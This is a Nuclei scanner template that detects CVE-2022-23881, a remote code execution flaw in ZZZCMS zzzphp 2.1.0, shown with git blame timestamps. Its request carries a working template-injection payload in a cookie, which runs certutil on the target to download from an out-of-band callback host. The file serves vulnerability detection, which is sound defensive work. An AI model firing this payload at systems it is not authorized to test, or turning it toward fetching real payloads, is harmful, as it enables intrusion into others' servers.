nuclei-templates/http/cves/2022/CVE-2022-23881.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

2022-03-29 23:41:01 +00:00
id: CVE-2022-23881
info:
name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution
2022-03-29 23:41:01 +00:00
author: pikpikcu
severity: critical
description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp.
2022-03-29 23:41:01 +00:00
reference:
- https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md
2022-04-02 10:25:31 +00:00
- http://www.zzzcms.com
- https://nvd.nist.gov/vuln/detail/CVE-2022-23881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-23881
cwe-id: CWE-77
2023-07-11 19:49:27 +00:00
epss-score: 0.29422
2023-08-31 11:46:18 +00:00
epss-percentile: 0.96308
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zzzcms
product: zzzphp
tags: cve,cve2022,rce,zzzphp,zzzcms
2022-03-29 23:41:01 +00:00
http:
2022-03-29 23:41:01 +00:00
- raw:
- |
GET /?location=search HTTP/1.1
Host: {{Hostname}}
Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
2022-04-02 10:25:31 +00:00
- type: status
status:
- 500